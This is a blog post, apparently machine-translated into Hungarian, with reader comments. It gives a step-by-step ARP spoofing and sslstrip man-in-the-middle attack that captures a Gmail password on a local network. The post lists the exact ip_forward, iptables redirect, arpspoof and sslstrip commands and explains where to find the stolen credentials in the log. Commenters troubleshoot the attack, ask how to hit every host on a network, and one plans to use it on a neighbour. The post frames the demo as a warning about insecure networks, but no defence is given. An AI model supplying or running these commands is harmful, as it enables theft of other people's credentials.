Helló Bloggerek.
A mai napra van egy kis mintám arról, hogy milyen veszélyes lehet csatlakozni minden olyan nem biztonságos hálózathoz, amely oly sokaknak tetszik.
A mai napra az ArpSpoofing és az Sslstrip segítségével fogom használni a Gmail jelszavát. A környezet kontrolláltabbá tétele érdekében létrehoztam egy fiókot "testarp@gmail.com".
És mivel nem nagyon szeretem a preambulumokat, térjünk rá az üzletre.
KÖRNYEZET
Ehhez a teszthez a következő áll rendelkezésünkre:
1. Támadó: Az asztali vagy asztali számítógépem rendelkezik Debian Wheezy-vel. Az adattárakból telepítheti sslstrip y szippantás hogy megszerezzék hárfás
2. Áldozat: Az áldozat egy Android tábla, amely csak a böngészőn keresztül szeretné látni leveleit.
3. A táptalaj: A középső az én Cisco DPC2425 router
CÍMEK.
Támadó címe: 172.26.0.2
Útválasztó címe: 172.26.0.1
Az áldozat címe: 172.26.0.8
A TÁMADÁS:
Az első dolog, amit megteszünk a támadásért, az az előreindítás aktiválása, hogy számítógépünk továbbítsa az információkat az áldozatnak anélkül, hogy észrevennék. (Ellenkező esetben a szolgáltatások megtagadásának támadása lenne)
Ehhez a következőket fogjuk használni:
echo "1" > /proc/sys/net/ipv4/ip_forward
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-ports 8080
arpspoof -i eth0 -t 172.26.0.8 172.26.0.1
arpspoof -i eth0 -t 172.26.0.1 172.26.0.2
sslstrip -a -w desdelinux -l 8080
Ha most farok -f desdelinux élőben és közvetlenül látjuk az információkat
Tehát akkor hogyan érhetjük el azt, amit akarunk?
Először írjuk be e-mailünket a táblagépre. Bejelentkezés közben azt látjuk, hogy ezer és ezer dolog jelenik meg a konzolunkon.
Most, hogy kész, nyissuk meg a fájlunkat "desdelinux” nanoval
nano desdelinux
a Control + W billentyűkombinációval a SECURE POST nevet keresjük.
És látni fogunk valami ilyesmit.
Az a hatalmas sor, amely nem látható, az áldozat e-mailje és jelszava.
Tehát jobbra futunk, míg végre meglátjuk a fényt az alagút végén.
Egy másik alkalommal meglátjuk, hogyan védhetjük meg magunkat egy kicsit ezektől a támadásoktól.
Üdvözlet
Megragadom az alkalmat, hogy elmondjam, amikor a bejegyzés megjelent, a parancsok nem voltak helyesek.
A végén található iptables parancsból hiányzik a 8080, amely egy másik sorban található. És akkor az arpspoof parancsok ugyanazon a vonalon voltak. Minden parancs külön sorban van.
Remélhetőleg a szerkesztő látja és meg tudja javítani.
Üdvözlet.
Végeztem az Ön által említett javításokkal, ez rendben van?
Ha kódot kíván beilleszteni egy preferált bejegyzésbe, akkor használja a HTML nézetet, és ellenőrizze, hogy a cikk helyes-e, mielőtt elküldené függőben. Köszönöm.
Megdöbbentő tudni, hogy azok, akiknek nincs tudásunk, annyira kiszolgáltatottak. Nagyon jó információ, még akkor is, ha keveset értek a témához, felismerem a fontosságát. Köszönöm!
Üdvözlet
De ez csak akkor működik, ha a támadó és az áldozat ugyanazon a hálózaton vannak. Mindenesetre úgy tűnik számomra, hogy ha (ugyanazon a hálózaton tartózkodva) HTTPS használatával csatlakozik, az nem történik meg, mert az adatok titkosítva vannak, mielőtt elhagyja a gépet. Ha HTTP-n keresztül csatlakozik (S nélkül), akkor úgy gondolom, hogy még a hálózati kábelt nézve is megjelenik a kulcs.
Ez nem igaz. Feltörök egy gmail jelszót, és ha észreveszed, hogy a gmail https-t használ. Így? A lényeg az, hogy bár a https biztonságos, a http-től függ. Tehát nem olyan biztonságos.
Ne valljon annyit egy https-ről, hogy az S nem a Supermannek szól, hanem a "biztonságos" -nak
https-sel vagy anélkül működik, kipróbáltam egy speciálisabb linux disztróval és problémamentesen működik
Pontosan használhatja arra, hogy leckét tanítson azoknak, akik ellopják a Wi-Fi-t. 😀
Nagyjából olyan, mint amit régen mondtak Chema Alonso blogján:
http://www.elladodelmal.com/2013/04/hackeando-al-vecino-hax0r-que-me-roba.html
http://www.elladodelmal.com/2013/04/hackeando-al-vecino-hax0r-que-me-roba_5.html
Ostia, nagyszerű, mit csinál! / És akkor azt mondják a paranoiámnak, valahányszor a VPN-t használom, amikor elmennek a bankszámla ellenőrzésére ...). Egyébként meg kell látni, hogy az emberek mennyire cinikusak a kommentekben ... ha a végén lop ...
Most oktatóanyagot kell készítenünk a saját VPN-szolgáltatás létrehozásáról és felajánlásáról.
A linkelt történet nagyon érdekes, sőt érdemesnek tűnik egy regényes könyvhöz, és ez emlékeztet bennem, amikor szomszédaim internetét használtam, és bár azt mondom, hogy ismerem a témát, azt hiszem, soha nem láthattam a az a veszély, hogy utoljára megmaradhattam, szerencsére nekem csak a jelszót változtatták WPA2-re, és itt kezdődött a történetem az internetszolgáltatóval haha
Ezért mondja a cím, hogy Sslstrip működik.
Működik, amíg a támadó középen van
Milyen hullámot dolgozol a prizmánál? -.-
nem.
Mit vársz, hogy elküldhesd a kérésedet XD
tekintetében
jó poszt
Érdekes, később elvégzek egy oktatási tesztet ... Talán még a WiFi jelszavát is eltávolíthatnám, és szórakozhatnék egy kicsit 😛
Véletlenül tehet valami hasonlót, hogy különböző oldalakat küldjön a megcélzott oldalaknak? Például meg akarják nyitni a Facebookot, én pedig átirányítom őket a Google-ba? 😛
Igen. De mindez nagyon más tekercs.
Talán később postázom.
nagyon jó bejegyzés, ezek a témák nagyon oktató jellegűek, most képesnek kell lennünk ellensúlyozni ezt a támadást, mivel egyesek (például én) nyilvános hálózatokhoz csatlakoznak (például az egyetemhez), hasznos lenne elkerülni.
Üdvözlet!
Nekem nem sikerült 🙁
Valami kudarcot vall itt, azon kívül, hogy a https-kapcsolatokat egy szerver-tanúsítvány titkosítja (miután a tanúsítvány megtalálható a gépen, a böngészője felelős a titkosításért) olyan iptables-sel, amely a 80-as (http) portot irányítja át, nem a 443-at, ami a https
Én is azt hittem. A lényeg az, hogy bár a https "biztonságos", sajnos a http-től függ. Tehát az sslstrip kihasználja ezt, elhiteti a böngészővel, hogy https-hitelesítő adatokat használ, de nem.
Szent szar! de a böngészőnek látnia kell egy figyelmeztetést, például "ez a tanúsítvány gyanús webhelyről származik, vagy valami hasonló" ... feltétlenül teszteket kell végeznem XD
Nem, semmi sem jön ki.
Végül nekem bevált
Jelszóval vagyok csatlakoztatva egy WEP hálózathoz, és egyébként is közvetlenül megmutatta a jelszót.
Egy lekérdezés. Megteheti ugyanazt az eljárást, de az összes számítógéphez, amely csatlakozik a hálózathoz, ahelyett, hogy egyetlen áldozata lenne?
Igen tudsz. De nem végeztem kísérleteket. Próbáld ki te is, és mondd el, hogy megy.
Ezzel csak annyit kapok, hogy az áldozat gépe offline állapotba kerül, de az sslstrip nem mutat semmit: /
Egy pillanatra le kell tiltania a tűzfalat. Vagy legalább engedélyezze a bejövő kapcsolatokat.
Probe és én csak a facebook oldal felhasználónevét és jelszavát láthattuk, a gmail-ben nem találtam eredményt a naplóban, és csak egy sor arpspoof «arpspoof -i -t« kellett. Másrészt az áldozati gép nem tudott kinyitni néhány oldalt. Folytatom a nyomozást, nagyon érdekes. Segítség azoknak, akik a Manjarót használják, a telepítéshez szükséges csomagok a következők: dsniff (itt az arpspoff), twisted és python2-pyopenssl. Az Sslstrip innen tölthető le: http://www.thoughtcrime.org/software/sslstrip/
A futtatásához $ python2 sslstrip.py
Üdvözlet.
Nem jött ki, de az arpspoof sor: #arpspoof -i int -t ip-áldozat ip-router
nézd, pontosan azt teszem, amit mondasz:
echo "1"> / proc / sys / net / ipv4 / ip_forward iptables -t nat -A PREROUTING -p tcp - cél-port 80 -j REDIRECT - 8080-as portokhoz
arpspoof -i eth0 -t 172.26.0.8 172.26.0.1
arpspoof -i eth0 -t 172.26.0.1 172.26.0.2
a probléma az, hogy az áldozat, aki egy másik pc, hogy itt van a szobámban, nincs kapcsolatom azzal a ponttal, hogy újra kell indítanom az útválasztót, mit tehetek nekem.
Egy másik dolog, amit virtuális géppel dolgozok, és amikor végrehajtom az iwconfig parancsot, a wlan0 nem jelenik meg, és az ifconfig végrehajtásakor sem, ha azonban van internetem a virtuális gépemen, akkor mi eth0 interfésszel.